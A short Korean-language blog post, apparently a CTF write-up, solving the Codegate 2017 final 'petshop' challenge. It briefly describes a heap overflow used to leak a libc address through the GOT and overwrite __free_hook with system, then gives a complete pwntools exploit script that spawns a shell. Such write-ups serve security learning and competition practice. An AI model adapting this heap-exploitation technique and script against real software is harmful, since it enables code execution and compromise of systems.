Pwnable/CTF
Codegate 2017 final petshop
HSr00t
2018. 3. 22. 23:40
취약점은 힙 오버플로우가있고 난이도는 쉽다.
string객체를 got로 덮어서 릭을하고 freehook을 시스템으로 덮고 (왜 freehook을 덮었는지 모르겠다 ㄷㄷ) ~basic string 같이 소멸자에서 free가 실행되기 때문에 이것을 이용하여서 문제를 풀었다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | from pwn import * def set_pet(name,sound,feed): p.sendlineafter('select:','4') p.sendlineafter('set:','1') p.sendlineafter(':',name) p.sendlineafter(':',sound) p.sendlineafter(':',feed) p=process('./petshop') p.sendlineafter(':','1') p.sendlineafter(':','1') p.sendlineafter('select:','6') p.sendlineafter('name?','AAAA') set_pet('A','B','C'*12+p64(0x604088)+p64(0x8)) p.sendlineafter('select:','5') p.recvuntil('person:') strcpy = u64(p.recv(8)) libc_base = strcpy - 0x16bca0 system = libc_base + 0x47dc0 free_hook = libc_base + 0x3dc8a8 malloc_hook = libc_base + 0x3dac10 print hex(strcpy) print hex(libc_base) print hex(free_hook) set_pet('A','B','C'*12+p64(free_hook)+p64(8)) p.sendlineafter('select:','6') p.sendlineafter('name?',p64(system)) set_pet('A','B','C'*12+p64(malloc_hook)+p64(8)) p.sendlineafter('select:','6') p.sendlineafter('name?','/bin/sh\x00') p.sendlineafter('select:','2') p.interactive() | cs |